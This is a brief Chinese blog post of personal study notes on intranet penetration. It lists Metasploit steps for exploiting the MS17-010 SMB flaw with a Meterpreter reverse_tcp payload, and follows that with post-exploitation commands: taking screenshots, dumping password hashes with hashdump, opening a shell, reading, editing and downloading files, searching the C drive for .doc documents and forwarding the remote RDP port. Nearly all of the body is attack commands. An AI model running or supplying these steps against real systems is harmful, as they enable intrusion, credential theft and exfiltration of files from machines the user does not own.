内网篇

作者: F_6e2e | 来源:发表于2018-10-02 10:24 被阅读0次

搞了这么久,还没真正的内网漫游过。趁着闲,学习一下。

msf

1. use exploit/windows/smb/ms17_010 使用一个模块

2. show options 查看配置

3.show payloads 查看所有payload

4. set payload windows/x64/meterpreter/reverse_tcp 返回一个会话

5.会话建立成功

6. screenhost 截图

7.hashdump 获得密码哈希,在线破解就是

8. shell 获得一个cmd

9.background命令,返回把meterpreter后台挂起

10. session -i 继续利用

11.cat C:\\ xxx  查看一个文件内容

12. edit xxxx 修改文件内容

13. upload 上传/  dowload 下载

14. search  -d c:\\ -f *.doc 搜索文件  (在目标主机C盘下搜索doc文档)

15. portfwd 端口转发。portfwd  add -l 1122 -p 3389 -r 192.168.250.176(把远程地址的3389转发到其他端口)

相关文章

  • 内网篇

    搞了这么久,还没真正的内网漫游过。趁着闲,学习一下。 msf 1. use exploit/windows/smb...

  • 内网渗透-代理篇

    前言 最近参与内网渗透比较多,认知到自己在会话维持上过于依赖web服务,web服务一旦关闭,便失去了唯一的入口点。...

  • Ngrok服务端搭建

    本文介绍Ngrok服务搭建。Ngrok和花生壳类似都是内网穿透工具,了解更多可以查看另外一篇专门介绍内网穿透工具的...

  • 程序猿常用网站大全(一)

    国内网站➕国内网站➕国内网站➕国内网站➕国内网站➕国内网站➕国内网站 1.慕课网 慕课网 2.百度传课 百度传课 ...

  • 玩转ubuntu ——内网穿透篇

    很多同学都开发中都有想在手机上调试的需求,又或者是需要在微信上调试,当然我们有很多选择,比如fidder,whis...

  • Sunny-Ngrok实现自定义域名内网穿透

    内网穿透 + Sunny-Ngrok + 自定义域名 1、内网穿透 1.1 内网IP:内网IP,过多官方的解释这里...

  • 杭州萧山姑娘网上筹款称爸爸确诊胃癌 几天后却在微博上炫富

    声明(转载) 杭州网官方账号 萧内网萧山论坛 前两天,萧内网上一篇曝光帖传得沸沸扬扬。有网友说,这件事让他「三观震...

  • 招行“蛋壳”的诱惑

    最近看了一篇《打破看不见的墙》的文章,介绍了招行轻文化建设中招行内网“蛋壳”的方方面面,深受启发。 一、内网的边界...

  • 内网端口穿透

    内网端口穿透 内网穿透在实际生活中,我们经常会在内网里部署服务让外网访问内网应用。这里我用的花生壳免费的内网穿透。...

  • iptables简单配置DMZ

    要求 内网可以访问外网 内网可以访问DMZ区 外网不能访问内网 外网能访问DMZ区的服务 DMZ区不能访问内网 D...

网友评论

      本文标题:内网篇

      本文链接:https://www.haomeiwen.com/subject/jcddoftx.html